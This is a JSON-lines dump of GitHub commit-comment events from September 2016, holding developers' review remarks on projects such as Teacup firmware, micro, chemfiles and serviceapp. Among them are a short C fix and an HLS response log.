{"id":"4523614438","type":"CommitCommentEvent","actor":{"login":"Traumflug"},"repo":{"name":"Traumflug/Teacup_Firmware"},"payload":{"comment":{"id":18917832,"position":null,"line":null,"path":null,"commit_id":"5b59f19e009fe8e2b8e083b6287e719317de1f4a","created_at":"2016-09-06T20:15:02Z","updated_at":"2016-09-06T20:15:02Z","body":"First, thank you for the other two commits on this branch, I just picked them onto *experimental* and rebased this branch.\r\n\r\n/This/ commit reminds me of branch 'lookahead' with exactly [one commit](https://github.com/Traumflug/Teacup_Firmware/commit/f43afd997bd9c91bee5b31e139c2f2b153ab9476). This one commit introduces three M-codes to turn lookahead on, turn it off and print statistics.\r\n\r\nLooking at how flawlessly lookahead code works (within its known limits), is there any point in turning lookahead off? If there is, I'd pick the code on that branch rather than applying this commit.\r\n"}},"created_at":"2016-09-06T20:15:02Z"}
{"id":"4523617605","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"zyedidia/micro"},"payload":{"comment":{"id":18917840,"position":null,"line":null,"path":null,"commit_id":"539495d2f740f006afd42efbce4d91050b0802f1","created_at":"2016-09-06T20:15:38Z","updated_at":"2016-09-06T20:15:38Z","body":"Now `micro` should be renamed to `macro`. Why `CtrlJ`?"}},"created_at":"2016-09-06T20:15:38Z"}
{"id":"4523618365","type":"CommitCommentEvent","actor":{"login":"BillFulk"},"repo":{"name":"stevebosserman/challenge-of-change"},"payload":{"comment":{"id":18917843,"position":5,"line":11,"path":"CofC-InstitutionalTransformation.md","commit_id":"79f8eb0e22b1e6ec5bf2a449447a94969c355871","created_at":"2016-09-06T20:15:46Z","updated_at":"2016-09-06T20:15:46Z","body":"THIS IS A TENTATIVE START AT EDITING."}},"created_at":"2016-09-06T20:15:46Z"}
{"id":"4523624846","type":"CommitCommentEvent","actor":{"login":"lexmag"},"repo":{"name":"hexpm/hex"},"payload":{"comment":{"id":18917852,"position":27,"line":76,"path":"lib/mix/tasks/hex/user.ex","commit_id":"52d4e6d3fc9cd383baf8a65bf90c2ae41a69e5c0","created_at":"2016-09-06T20:16:55Z","updated_at":"2016-09-06T20:16:55Z","body":"😭"}},"created_at":"2016-09-06T20:16:55Z"}
{"id":"4523626907","type":"CommitCommentEvent","actor":{"login":"OSryx"},"repo":{"name":"atarallo/TECMINT_MONITOR"},"payload":{"comment":{"id":18917858,"position":null,"line":null,"path":null,"commit_id":"befc21eb1c8ff1f5bf6c904e19c545f842f89d3a","created_at":"2016-09-06T20:17:18Z","updated_at":"2016-09-06T20:17:18Z","body":"can you please state why you keep the _clear_ ?"}},"created_at":"2016-09-06T20:17:18Z"}
{"id":"4523627504","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18917859,"position":25,"line":252,"path":"src/Elasticsearch/Repositories/ElasticRepositoryBase.cs","commit_id":"21f03473e273e85b01e2ee120ee27582950fede9","created_at":"2016-09-06T20:17:25Z","updated_at":"2016-09-06T20:17:25Z","body":"wouldn't we want this?"}},"created_at":"2016-09-06T20:17:25Z"}
{"id":"4523627728","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18917861,"position":109,"line":109,"path":"0309_2_Homework7_SpendingTracker/0309_2_Homework7_SpendingTracker/ExpenseTableViewController.swift","commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T20:17:28Z","updated_at":"2016-09-06T20:17:28Z","body":"imas li potrebe za ovim ? ja mislim da nemas"}},"created_at":"2016-09-06T20:17:28Z"}
{"id":"4523644524","type":"CommitCommentEvent","actor":{"login":"phord"},"repo":{"name":"Traumflug/Teacup_Firmware"},"payload":{"comment":{"id":18917910,"position":null,"line":null,"path":null,"commit_id":"5b59f19e009fe8e2b8e083b6287e719317de1f4a","created_at":"2016-09-06T20:20:28Z","updated_at":"2016-09-06T20:20:28Z","body":"If I set my JERK values too high, I might get missed steps.  If I get missed steps and I wonder if it's because my JERK is too high, I would turn off lookahead and try the print again to collect more data. Yes, it is useful to be able to disable lookahead.  But when I did it in the past, I did so by recompiling. "}},"created_at":"2016-09-06T20:20:28Z"}
{"id":"4523647029","type":"CommitCommentEvent","actor":{"login":"trevordjones"},"repo":{"name":"ryujae0125/beerlist-api"},"payload":{"comment":{"id":18917926,"position":20,"line":20,"path":"app/controllers/api/v1/beers_controller.rb","commit_id":"26225723c9efa5814080ac315e28eba573c6d084","created_at":"2016-09-06T20:20:55Z","updated_at":"2016-09-06T20:20:55Z","body":"Did you only use your v2 API? Looks like right here `beer` is not defined. You define it as `@beer` up above."}},"created_at":"2016-09-06T20:20:55Z"}
{"id":"4523647138","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Exceptionless.LuceneQueryParser"},"payload":{"comment":{"id":18917928,"position":32,"line":48,"path":"Source/ElasticMacros/ElasticMacrosConfiguration.cs","commit_id":"7c4a7a8dcbf233f3dc60a408d45ec8a04170931c","created_at":"2016-09-06T20:20:56Z","updated_at":"2016-09-06T20:20:56Z","body":"Probably want to do ToLowerInvariant here. Non english cultures could cause us issues (probably should look at all usages)."}},"created_at":"2016-09-06T20:20:56Z"}
{"id":"4523654258","type":"CommitCommentEvent","actor":{"login":"rubenscholfield"},"repo":{"name":"rubenscholfield/Tutorial"},"payload":{"comment":{"id":18917953,"position":null,"line":null,"path":null,"commit_id":"992749a7098ded3da32f153baf75c9e32d823f9b","created_at":"2016-09-06T20:22:14Z","updated_at":"2016-09-06T20:22:14Z","body":"i need my simulator for spacecraft\r\n"}},"created_at":"2016-09-06T20:22:14Z"}
{"id":"4523671044","type":"CommitCommentEvent","actor":{"login":"andysim"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18917992,"position":null,"line":null,"path":null,"commit_id":"9235014a1ae7c86c1067462d23c85b37ff64ce96","created_at":"2016-09-06T20:25:15Z","updated_at":"2016-09-06T20:25:15Z","body":"This is maybe a little too soon because the 3.9 repo has not been greenlighted by Travis yet, but there [is a ticket](https://github.com/travis-ci/apt-source-whitelist/issues/300) so I think it'll be ready to go soon."}},"created_at":"2016-09-06T20:25:15Z"}
{"id":"4523674405","type":"CommitCommentEvent","actor":{"login":"atarallo"},"repo":{"name":"atarallo/TECMINT_MONITOR"},"payload":{"comment":{"id":18918004,"position":null,"line":null,"path":null,"commit_id":"befc21eb1c8ff1f5bf6c904e19c545f842f89d3a","created_at":"2016-09-06T20:25:50Z","updated_at":"2016-09-06T20:25:50Z","body":"I've removed the _clear_. I had uncomited changes, between your commit and my latest commits. So I did ths commit where I've removed the clear. \r\n\r\nThanks for taking time to review development. "}},"created_at":"2016-09-06T20:25:50Z"}
{"id":"4523677992","type":"CommitCommentEvent","actor":{"login":"The-Compiler"},"repo":{"name":"The-Compiler/qutebrowser"},"payload":{"comment":{"id":18918012,"position":null,"line":null,"path":null,"commit_id":"1106104700128733d66e4b55601e84fe7f7dd2f1","created_at":"2016-09-06T20:26:27Z","updated_at":"2016-09-06T20:26:27Z","body":"Whooo, 10k commits! :tada: "}},"created_at":"2016-09-06T20:26:27Z"}
{"id":"4523683161","type":"CommitCommentEvent","actor":{"login":"auser"},"repo":{"name":"IjzerenHein/react-native-firestack"},"payload":{"comment":{"id":18918028,"position":null,"line":null,"path":null,"commit_id":"3ddc98005c27e0e80bff753a8cd3c795c3c8aec8","created_at":"2016-09-06T20:27:21Z","updated_at":"2016-09-06T20:27:21Z","body":"This looks awesome. What is left to complete this integration?"}},"created_at":"2016-09-06T20:27:21Z"}
{"id":"4523683375","type":"CommitCommentEvent","actor":{"login":"mkowal07"},"repo":{"name":"nurunner-linux/nurunner-default-settings"},"payload":{"comment":{"id":18918030,"position":null,"line":null,"path":null,"commit_id":"5dcce060d17adc14148e85cbdba2e26412231b10","created_at":"2016-09-06T20:27:24Z","updated_at":"2016-09-06T20:27:24Z","body":"Commit description does not match and is a repeat because I am still figuring out git. "}},"created_at":"2016-09-06T20:27:24Z"}
{"id":"4523686307","type":"CommitCommentEvent","actor":{"login":"Wurstnase"},"repo":{"name":"Traumflug/Teacup_Firmware"},"payload":{"comment":{"id":18918039,"position":null,"line":null,"path":null,"commit_id":"5b59f19e009fe8e2b8e083b6287e719317de1f4a","created_at":"2016-09-06T20:27:54Z","updated_at":"2016-09-06T20:27:54Z","body":"I don't see any benefit for a normal usecase. If we start to disable such a feature with a gcode we could also add gcodes for manipulating acc, yerk, steps/m etc. which would be used much more.\r\n\r\nOnly point could be the statistic counter. But I wouldn't miss it."}},"created_at":"2016-09-06T20:27:54Z"}
{"id":"4523695262","type":"CommitCommentEvent","actor":{"login":"Sparen"},"repo":{"name":"Sparen/Summer2016_Network"},"payload":{"comment":{"id":18918075,"position":null,"line":null,"path":null,"commit_id":"da4466fdf5054ade98d33b5c17e15a4f2d7d996a","created_at":"2016-09-06T20:29:30Z","updated_at":"2016-09-06T20:29:30Z","body":"Fixed"}},"created_at":"2016-09-06T20:29:30Z"}
{"id":"4523697385","type":"CommitCommentEvent","actor":{"login":"rebornix"},"repo":{"name":"rubyide/vscode-ruby"},"payload":{"comment":{"id":18918082,"position":null,"line":null,"path":null,"commit_id":"951e34dd93ae73a780fa2b4826ab03aaeefdc59d","created_at":"2016-09-06T20:29:53Z","updated_at":"2016-09-06T20:29:53Z","body":"@robsonpeixoto sure, will do that next time as I'm bumping version directly in GitHub and release it through Slack."}},"created_at":"2016-09-06T20:29:53Z"}
{"id":"4523700626","type":"CommitCommentEvent","actor":{"login":"missyschoenbaum"},"repo":{"name":"NAVADMC/ISPStandard"},"payload":{"comment":{"id":18918102,"position":7,"line":7,"path":"pop_circle_6.csv","commit_id":"d1332d7c011080365bab52bc6280473cbca7aecb","created_at":"2016-09-06T20:30:28Z","updated_at":"2016-09-06T20:30:28Z","body":"Try to change something"}},"created_at":"2016-09-06T20:30:28Z"}
{"id":"4523703016","type":"CommitCommentEvent","actor":{"login":"haldre"},"repo":{"name":"EBL-Marianas/GutPassage_review"},"payload":{"comment":{"id":18918113,"position":null,"line":null,"path":null,"commit_id":"8d517295ed8a58a12029a7f034568729a748f39a","created_at":"2016-09-06T20:30:52Z","updated_at":"2016-09-06T20:30:52Z","body":"merge this"}},"created_at":"2016-09-06T20:30:52Z"}
{"id":"4523711974","type":"CommitCommentEvent","actor":{"login":"kurtrwall"},"repo":{"name":"hillaryj/cfgov-refresh"},"payload":{"comment":{"id":18918145,"position":null,"line":null,"path":null,"commit_id":"ac86bfb0eae17922f62601b938e7fb5539157732","created_at":"2016-09-06T20:32:29Z","updated_at":"2016-09-06T20:32:29Z","body":"This is great stuff! To recap, the form should be overridden to include GovDelivery registration and logging, and this code should be moved into it's own file within the models directory instead of on base.py. One thing I forgot to mention is the need for a migration in order for the database tables to be created. \r\n\r\nAnother way to test the functionality of the model and modelform is to just open up a django shell (`cfgov/manage.py shell`), import the classes, and play around with them. "}},"created_at":"2016-09-06T20:32:29Z"}
{"id":"4523712054","type":"CommitCommentEvent","actor":{"login":"OSryx"},"repo":{"name":"atarallo/TECMINT_MONITOR"},"payload":{"comment":{"id":18918147,"position":null,"line":null,"path":null,"commit_id":"befc21eb1c8ff1f5bf6c904e19c545f842f89d3a","created_at":"2016-09-06T20:32:30Z","updated_at":"2016-09-06T20:32:30Z","body":"ah okey I see now, thx"}},"created_at":"2016-09-06T20:32:30Z"}
{"id":"4523714287","type":"CommitCommentEvent","actor":{"login":"zyedidia"},"repo":{"name":"zyedidia/micro"},"payload":{"comment":{"id":18918159,"position":null,"line":null,"path":null,"commit_id":"539495d2f740f006afd42efbce4d91050b0802f1","created_at":"2016-09-06T20:32:55Z","updated_at":"2016-09-06T20:32:55Z","body":"No reason. They were close together and they were the only keys that weren't already bound."}},"created_at":"2016-09-06T20:32:55Z"}
{"id":"4523717448","type":"CommitCommentEvent","actor":{"login":"josePhoenix"},"repo":{"name":"mperrin/poppy"},"payload":{"comment":{"id":18918168,"position":23,"line":309,"path":"poppy/instrument.py","commit_id":"952aa6966dba24c7afb87b48b4525d2b3a0268ff","created_at":"2016-09-06T20:33:31Z","updated_at":"2016-09-06T20:33:31Z","body":"I think you could hold on to a reference to `psf[ext].data` and still make a new cube with `np.zeros` and avoid a `deepcopy`."}},"created_at":"2016-09-06T20:33:31Z"}
{"id":"4523719089","type":"CommitCommentEvent","actor":{"login":"jrochkind"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":18918172,"position":4,"line":17,"path":"activerecord/test/models/book.rb","commit_id":"67c1719012506c3387df067961252b5df50a97ce","created_at":"2016-09-06T20:33:46Z","updated_at":"2016-09-06T20:33:46Z","body":"@sgrif This seems to be the first time there was a test case around Enum with db values that were Strings rather than integers. \r\n\r\nBut it's associated with a few PR's and Issues that are about default values in Enums, and don't seem to mention db types or if/when/that db strings are supported as well as Integers. \r\n\r\nSomething that's still not documented anywhere, such as the Enum class header inline docs!\r\n\r\nCurious if you know anything about the origin/history of Enum supporting String db values? I was wishing it did, and went to look at the source -- to find that it already did. At least in Rails5. Now I'm very curious."}},"created_at":"2016-09-06T20:33:46Z"}
{"id":"4523719524","type":"CommitCommentEvent","actor":{"login":"josePhoenix"},"repo":{"name":"mperrin/poppy"},"payload":{"comment":{"id":18918173,"position":5,"line":27,"path":"poppy/tests/test_instrument.py","commit_id":"952aa6966dba24c7afb87b48b4525d2b3a0268ff","created_at":"2016-09-06T20:33:52Z","updated_at":"2016-09-06T20:33:52Z","body":"🎉 "}},"created_at":"2016-09-06T20:33:52Z"}
{"id":"4523722708","type":"CommitCommentEvent","actor":{"login":"peter-mouland"},"repo":{"name":"mxstbr/sharingbuttons.io"},"payload":{"comment":{"id":18918186,"position":null,"line":null,"path":null,"commit_id":"6fe5c8f2d20cef0b9401405824e094c4ca2fee5a","created_at":"2016-09-06T20:34:27Z","updated_at":"2016-09-06T20:34:27Z","body":"...the wiki can be turned on and off from the repo settings page. maybe someone turned it off by mistake or was it meant to be replaced with a contributing.md?"}},"created_at":"2016-09-06T20:34:27Z"}
{"id":"4523725992","type":"CommitCommentEvent","actor":{"login":"Taapat"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18918196,"position":20,"line":213,"path":"src/serviceapp/m3u8.cpp","commit_id":"28c10b1f909031152c3e75c31a6c60f27294783e","created_at":"2016-09-06T20:35:02Z","updated_at":"2016-09-06T20:35:02Z","body":"I think that this is wrong.\r\nMaybe I missed something, but it seems that this allows only 7 lines of data.\r\nWe are one continue on the Content-Length and the other continue on the first blank line in contentStarted.\r\n\r\nI think that correct is start line counting only after contentStarted:\r\n```\r\n        if (!contentStarted)\r\n        {\r\n            if (!result)\r\n            {\r\n                contentStarted = true;\r\n                fprintf(stderr, \"[%s] - content part started\\n\", __func__);\r\n            }\r\n         else\r\n                  contentLines++;\r\n```\r\n\r\nAnd maybe it is better not to add another variable but change contentStarted to int and use it."}},"created_at":"2016-09-06T20:35:02Z"}
{"id":"4523729779","type":"CommitCommentEvent","actor":{"login":"clade"},"repo":{"name":"clade/PyDAQmx"},"payload":{"comment":{"id":18918209,"position":60,"line":60,"path":"PyDAQmx/DAQmxFunctions.py","commit_id":"b6679c901dc7d0d26074b3c70c3f221b68aae234","created_at":"2016-09-06T20:35:44Z","updated_at":"2016-09-06T20:35:44Z","body":"Good point : see commit https://github.com/clade/PyDAQmx/commit/66c7e956c6369d3b69fc7d3719050d3693e12c99"}},"created_at":"2016-09-06T20:35:44Z"}
{"id":"4523732384","type":"CommitCommentEvent","actor":{"login":"pgbarletta"},"repo":{"name":"chemfiles/chemfiles"},"payload":{"comment":{"id":18918220,"position":64,"line":64,"path":"include/chemfiles/Residue.hpp","commit_id":"67ed2aa0d334054354bc4a8ad0528c3a2496e182","created_at":"2016-09-06T20:36:13Z","updated_at":"2016-09-06T20:36:13Z","body":"No non-constant iterator for the atoms, or did I miss it?"}},"created_at":"2016-09-06T20:36:13Z"}
{"id":"4523739762","type":"CommitCommentEvent","actor":{"login":"kristenmills"},"repo":{"name":"rit-sse/node-api"},"payload":{"comment":{"id":18918241,"position":null,"line":null,"path":null,"commit_id":"5cdc4cc1c765b8d7767498274a97b1ce61c5b4c0","created_at":"2016-09-06T20:37:31Z","updated_at":"2016-09-06T20:37:31Z","body":"This feels wrong to me. Idk."}},"created_at":"2016-09-06T20:37:31Z"}
{"id":"4523743213","type":"CommitCommentEvent","actor":{"login":"7imbrook"},"repo":{"name":"rit-sse/node-api"},"payload":{"comment":{"id":18918258,"position":null,"line":null,"path":null,"commit_id":"5cdc4cc1c765b8d7767498274a97b1ce61c5b4c0","created_at":"2016-09-06T20:38:11Z","updated_at":"2016-09-06T20:38:11Z","body":"feels wronger to have it in go when thats all static stuff. gtg senior project"}},"created_at":"2016-09-06T20:38:11Z"}
{"id":"4523756911","type":"CommitCommentEvent","actor":{"login":"Luthaf"},"repo":{"name":"chemfiles/chemfiles"},"payload":{"comment":{"id":18918307,"position":64,"line":64,"path":"include/chemfiles/Residue.hpp","commit_id":"67ed2aa0d334054354bc4a8ad0528c3a2496e182","created_at":"2016-09-06T20:40:40Z","updated_at":"2016-09-06T20:40:40Z","body":"No, you are right. The non constant version would allow modifications, and having the same atom in two different residue by mistake.\r\n\r\nI do not know if this is possible, but I do not think so. With this implementation, all the access to Residue trough the Topology are with constant references, and adding atoms to a residue can only be done before the residue is added to a topology. The residue is validated when added to a topology: https://github.com/chemfiles/chemfiles/blob/47ffba6a4b999c0ffb983a0a8fac172ec4d247df/src/Topology.cpp#L81-L84"}},"created_at":"2016-09-06T20:40:40Z"}
{"id":"4523759718","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18918318,"position":4,"line":36,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/JdbcTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-06T20:41:11Z","updated_at":"2016-09-06T20:41:11Z","body":"Yes, I know this should be in a different commit as it is not related to the new test.  I'll get it out before merging..."}},"created_at":"2016-09-06T20:41:11Z"}
{"id":"4523762598","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18918325,"position":91,"line":91,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-06T20:41:42Z","updated_at":"2016-09-06T20:41:42Z","body":"I need some help here."}},"created_at":"2016-09-06T20:41:42Z"}
{"id":"4523765513","type":"CommitCommentEvent","actor":{"login":"roflinger"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18918337,"position":null,"line":null,"path":null,"commit_id":"4d4a1461e6501afc85cd81d77f9c0915bc9cbb02","created_at":"2016-09-06T20:42:16Z","updated_at":"2016-09-06T20:42:16Z","body":"whats your own repo? where?"}},"created_at":"2016-09-06T20:42:16Z"}
{"id":"4523769389","type":"CommitCommentEvent","actor":{"login":"svladykin"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18918352,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-06T20:42:55Z","updated_at":"2016-09-06T20:42:55Z","body":"@royrwood \r\nI can implement this `SysProperties.serializeJavaObject` stuff later myself. It should not affect correctness, only performance.\r\n\r\nPlease provide pull request with your changes, one of committers will review and merge it. Your code looks good to me, but we need to have a respective test. Especially it would be nice to have a test with PgSQL Jdbc driver which demonstrates the original goal of this improvement (see `TestPgServer`)."}},"created_at":"2016-09-06T20:42:55Z"}
{"id":"4523770822","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18918356,"position":11,"line":20,"path":"app/components/application/application.styl","commit_id":"62ac759d374229b76b6acb5ba02212be09d4237c","created_at":"2016-09-06T20:43:12Z","updated_at":"2016-09-06T20:43:12Z","body":"This change was a mistake. Will be fixed shortly."}},"created_at":"2016-09-06T20:43:12Z"}
{"id":"4523771742","type":"CommitCommentEvent","actor":{"login":"reywood"},"repo":{"name":"careercup/CtCI-6th-Edition-php"},"payload":{"comment":{"id":18918362,"position":17,"line":17,"path":"src/chapter16/question16.04/TicTacToe.php","commit_id":"1d4844f05d5aa179579f86155668d10b60c9ed04","created_at":"2016-09-06T20:43:21Z","updated_at":"2016-09-06T20:43:21Z","body":"`$i<$this->n` is tough to parse visually. Perhaps add some space, `$i < $this->n` (as you've done on line 71)."}},"created_at":"2016-09-06T20:43:21Z"}
{"id":"4523775996","type":"CommitCommentEvent","actor":{"login":"mmcfarland"},"repo":{"name":"WikiWatershed/model-my-watershed"},"payload":{"comment":{"id":18918369,"position":4,"line":21,"path":"src/mmw/apps/modeling/views.py","commit_id":"f13d14690d158e3d39d5b2d4dc508bf0e5d97df7","created_at":"2016-09-06T20:44:05Z","updated_at":"2016-09-06T20:44:05Z","body":"I'm not of sure of the implications of adding the django cache framework - I don't believe we're using it elsewhere in the app and I'm not sure what the defaults are.  For instance, is the default in-memory and if so, how much data are we caching (looks like a table's worth, not sure the row count).  Should we consider routing through nginx and using its caching like we do for observation points?  I was thinking of just adding cache-headers so the browsers aren't repeatedly making the request, but this is a promising idea as well - just want to make sure we think through the implications."}},"created_at":"2016-09-06T20:44:05Z"}
{"id":"4523779220","type":"CommitCommentEvent","actor":{"login":"LinuxDoku"},"repo":{"name":"LinuxDoku/ResiLab.AssemblyPatcher"},"payload":{"comment":{"id":18918377,"position":null,"line":null,"path":null,"commit_id":"990a69fd111c401faaa186c8f49bc49ecbce9c91","created_at":"2016-09-06T20:44:41Z","updated_at":"2016-09-06T20:44:41Z","body":"Close #9"}},"created_at":"2016-09-06T20:44:41Z"}
{"id":"4523779441","type":"CommitCommentEvent","actor":{"login":"pgbarletta"},"repo":{"name":"chemfiles/chemfiles"},"payload":{"comment":{"id":18918379,"position":73,"line":73,"path":"include/chemfiles/Residue.hpp","commit_id":"67ed2aa0d334054354bc4a8ad0528c3a2496e182","created_at":"2016-09-06T20:44:44Z","updated_at":"2016-09-06T20:44:44Z","body":"I see that you frequently use `find()` on the `atoms_` set and that;s why you decided to use an `std::unordered_set`, but I think that having unordered atoms indices is quite rare. Certainly PDB files are ordered and I can't imagine why someone would build residues with unordered atom indices. \r\nI think one should assume that the atoms are always ordered and use a binary search with `lower_bound()`. This way both search and iteration will be faster. Or is this assumption too unsafe?"}},"created_at":"2016-09-06T20:44:44Z"}
{"id":"4523781786","type":"CommitCommentEvent","actor":{"login":"mikeobrien"},"repo":{"name":"mikeobrien/Flexo"},"payload":{"comment":{"id":18918384,"position":null,"line":null,"path":null,"commit_id":"6022ee971e909725a483150b1f7397f5580944fc","created_at":"2016-09-06T20:45:11Z","updated_at":"2016-09-06T20:45:11Z","body":"TeamCity Flexo :: Deploy [Build 1.0.26.0](http://build.mikeobrien.net/viewLog.html?buildId=2687&buildTypeId=flexo&guest=1) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:10"}},"created_at":"2016-09-06T20:45:11Z"}
{"id":"4523781803","type":"CommitCommentEvent","actor":{"login":"Taapat"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18918385,"position":20,"line":213,"path":"src/serviceapp/m3u8.cpp","commit_id":"28c10b1f909031152c3e75c31a6c60f27294783e","created_at":"2016-09-06T20:45:11Z","updated_at":"2016-09-06T20:45:11Z","body":"Perhaps before I do not understand you.\r\nI think that five lines need counting only after the content part started.\r\nHere's a real HLS master playlist, in which you can see that #EXTM3U is in only 20 line:\r\n```\r\n[m3u8::getVariantsFromMasterUrl] Response[0](size=15): HTTP/1.1 200 OK\r\n[m3u8::getVariantsFromMasterUrl] Response[1](size=28): Server: nginx/1.4.6 (Ubuntu)\r\n[m3u8::getVariantsFromMasterUrl] Response[2](size=35): Date: Mon, 05 Sep 2016 17:52:35 GMT\r\n[m3u8::getVariantsFromMasterUrl] Response[3](size=58): Content-Type: application/vnd.apple.mpegurl; charset=utf-8\r\n[m3u8::getVariantsFromMasterUrl] Response[4](size=26): Transfer-Encoding: chunked\r\n[m3u8::getVariantsFromMasterUrl] Response[5](size=17): Connection: close\r\n[m3u8::getVariantsFromMasterUrl] Response[6](size=14): Status: 200 OK\r\n[m3u8::getVariantsFromMasterUrl] Response[7](size=27): X-Frame-Options: SAMEORIGIN\r\n[m3u8::getVariantsFromMasterUrl] Response[8](size=31): X-XSS-Protection: 1; mode=block\r\n[m3u8::getVariantsFromMasterUrl] Response[9](size=31): X-Content-Type-Options: nosniff\r\n[m3u8::getVariantsFromMasterUrl] Response[10](size=30): Access-Control-Allow-Origin: *\r\n[m3u8::getVariantsFromMasterUrl] Response[11](size=31): Access-Control-Allow-Methods: *\r\n[m3u8::getVariantsFromMasterUrl] Response[12](size=32): Access-Control-Request-Method: *\r\n[m3u8::getVariantsFromMasterUrl] Response[13](size=31): Access-Control-Allow-Headers: *\r\n[m3u8::getVariantsFromMasterUrl] Response[14](size=42): ETag: W/\"df8e20c9ee70d2c2c2570dc9a2170b94\"\r\n[m3u8::getVariantsFromMasterUrl] Response[15](size=50): Cache-Control: max-age=0, private, must-revalidate\r\n[m3u8::getVariantsFromMasterUrl] Response[16](size=50): X-Request-Id: 2fd891a8-865d-4b46-aa77-c85c79dc6730\r\n[m3u8::getVariantsFromMasterUrl] Response[17](size=19): X-Runtime: 0.006990\r\n[m3u8::getVariantsFromMasterUrl] Response[18](size=0): \r\n[m3u8::getVariantsFromMasterUrl] - content part started\r\n[m3u8::getVariantsFromMasterUrl] Response[19](size=3): 262\r\n[m3u8::getVariantsFromMasterUrl] Response[20](size=7): #EXTM3U\r\n[m3u8::getVariantsFromMasterUrl] Response[21](size=53): #EXT-X-STREAM-INF:RESOLUTION=640x272,BANDWIDTH=376000\r\n```"}},"created_at":"2016-09-06T20:45:11Z"}
{"id":"4523790571","type":"CommitCommentEvent","actor":{"login":"DaEgi01"},"repo":{"name":"lisa-lionheart/TrafficReport"},"payload":{"comment":{"id":18918404,"position":null,"line":null,"path":null,"commit_id":"fcbd0b0d5061e05000eef75164a3d89621629ac0","created_at":"2016-09-06T20:46:45Z","updated_at":"2016-09-06T20:46:45Z","body":"erm ... why do you spam achievements into debug.log ?"}},"created_at":"2016-09-06T20:46:45Z"}
{"id":"4523796239","type":"CommitCommentEvent","actor":{"login":"kristenmills"},"repo":{"name":"rit-sse/node-api"},"payload":{"comment":{"id":18918418,"position":null,"line":null,"path":null,"commit_id":"5cdc4cc1c765b8d7767498274a97b1ce61c5b4c0","created_at":"2016-09-06T20:47:43Z","updated_at":"2016-09-06T20:47:43Z","body":"I mean go is not a static site. And it should be able to handle its own concerns. And a data API shouldn't be responsible for this. We'll discuss later."}},"created_at":"2016-09-06T20:47:43Z"}
{"id":"4523801012","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"zacharyacutey/MyStuff"},"payload":{"comment":{"id":18918427,"position":null,"line":null,"path":null,"commit_id":"e3f10aea1c75292e70af1e318106efc7b0a87145","created_at":"2016-09-06T20:48:32Z","updated_at":"2016-09-06T20:48:32Z","body":"AHHH I FORGOT THE RADICALLLLLLLLL!"}},"created_at":"2016-09-06T20:48:32Z"}
{"id":"4523802191","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18918430,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-06T20:48:44Z","updated_at":"2016-09-06T20:48:44Z","body":"Not exactly a combo of 2 simple changes\r\nhttps://github.com/glinscott/fishtest/wiki/Fishtest-faq"}},"created_at":"2016-09-06T20:48:44Z"}
{"id":"4523808760","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/artwork-201620-1"},"payload":{"comment":{"id":18918446,"position":4,"line":27,"path":"artwork-api/src/main/java/co/edu/uniandes/csw/artwork/dtos/minimum/ArtistDTO.java","commit_id":"c4558ba873b0b56ed78c514d1c9f18f155c6cb50","created_at":"2016-09-06T20:49:56Z","updated_at":"2016-09-06T20:49:56Z","body":"La implementación del proyecto se ha hecho con el tipo Long (no primitivo), se sugiere usar este."}},"created_at":"2016-09-06T20:49:56Z"}
{"id":"4523812211","type":"CommitCommentEvent","actor":{"login":"alexwarren"},"repo":{"name":"soney/jsep"},"payload":{"comment":{"id":18918453,"position":5,"line":355,"path":"src/jsep.js","commit_id":"fb5b01f01bc453c703d8fbb7d2fb7e46948edde6","created_at":"2016-09-06T20:50:34Z","updated_at":"2016-09-06T20:50:34Z","body":"For my purposes I don't want this additional backslash. For example, I need to be able to escape quotation marks in a string:\r\n\r\n`\"I need \\\"quotation marks\\\" in strings\"`\r\n\r\nMaybe this needs to be configurable?"}},"created_at":"2016-09-06T20:50:34Z"}
{"id":"4523822401","type":"CommitCommentEvent","actor":{"login":"Luthaf"},"repo":{"name":"chemfiles/chemfiles"},"payload":{"comment":{"id":18918476,"position":73,"line":73,"path":"include/chemfiles/Residue.hpp","commit_id":"67ed2aa0d334054354bc4a8ad0528c3a2496e182","created_at":"2016-09-06T20:52:28Z","updated_at":"2016-09-06T20:52:28Z","body":"I did not though of the binary search, this can be better. We can even force the vector to be ordered by inserting new elements in the right place."}},"created_at":"2016-09-06T20:52:28Z"}
